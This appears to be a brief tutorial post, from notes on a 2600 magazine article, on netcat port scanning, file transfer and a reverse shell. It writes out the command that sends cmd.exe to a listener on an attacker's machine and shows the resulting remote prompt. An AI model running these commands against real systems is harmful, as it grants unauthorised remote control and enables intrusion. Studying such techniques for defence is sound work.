While I was going through my notes, I came across a topic which was originally posted on “2600: The Hacker Quarterly” Spring 2005, Volume 22.
This port scanning method could be as fast as nmap
nc -v -r -w3 -z target port1-portn
-v = verbose
-r = randomize the ports from the provided list
-w = wait time in seconds
-z = prevents sending data to the TCP connection
$ nc -v -r -z -w3 192.168.0.200 10-100
win2k3.example.com [192.168.0.200] 80 (www) open
This requires netcat to be installed on both machines (it works for both text and binary files).
$ nc -l -p port > file
$ nc -w3 target port < file
nc.exe -l -p 2112 > file
$ nc -w3 192.168.0.90 2112 < lab.php
Shovel the Shell…
This is one of the most interesting uses of netcat, here we will be using netcat for getting a command prompt at the remote machine, think of it as a reverse shell.
Attack machine syntax:
nc -vv -l -p port
Target machine syntax:
nc -e path_to_prog host port
$ nc -vv -l -p 2112
listening on [any] 2112 …
nc.exe -e cmd.exe 192.168.0.3 2112
Back to the Attacker machine…
connect to [192.168.0.3] from (UNKNOWN) [192.168.0.90] 23657
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.